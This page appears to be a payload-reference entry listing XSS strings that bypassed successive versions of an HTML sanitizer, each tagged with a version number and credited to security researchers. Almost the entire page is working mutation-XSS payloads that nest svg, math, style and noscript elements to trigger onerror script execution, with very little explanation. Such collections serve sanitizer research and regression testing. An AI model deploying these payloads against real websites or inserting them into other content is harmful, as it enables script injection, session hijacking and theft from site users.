XSS
Last updated
Last updated
This page contains some examples of payloads used to bypass sanitizers in the past. There are many other examples but to avoid redundancy we will add only ones that include new vectors or techniques.
2.0.0
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
2.0.17
<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>
2.0.17
<math><mtext><table><mglyph><style><!--</style><img title="--></mglyph><img	src=1	onerror=alert(1)>">
2.0.17
<math><mtext><table><mglyph><style><math><table id=”</table>”><img src onerror=alert(1)”>
2.2.0
<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">
2.2.3
<svg><xss><desc><noscript></noscript></desc><p></p><style><a title="</style><img src onerror=alert(1)>">
3.0.8
<svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>">
3.1.0
n = 506; var payload = `${"<div>".repeat(n)}<table id="outer"><caption id="outer"><svg><desc><table id="inner"><caption id="inner"></caption></table></desc><style><a title="</style><img src onerror=alert(1)>"></a></style></svg></caption></table>${"</div>".repeat(n)}`;
N/A
3.1.7
<svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="-><img src onerror=alert(1)>">.
3.1.0
<noscript><style></noscript><img src=x onerror=alert(1)>
3.1.1
<svg><style><img src=x onerror=alert(1)>
3.2.3
<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>
v20190215
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
Michał Bentkowski
Michał Bentkowski
Gareth Heyes
@web_payload team
Daniel Santos
Michał Bentkowski
Kévin - Mizu
Masato Kinugawa
Yaniv Nizry
Yaniv Nizry
Yaniv Nizry
Masato Kinugawa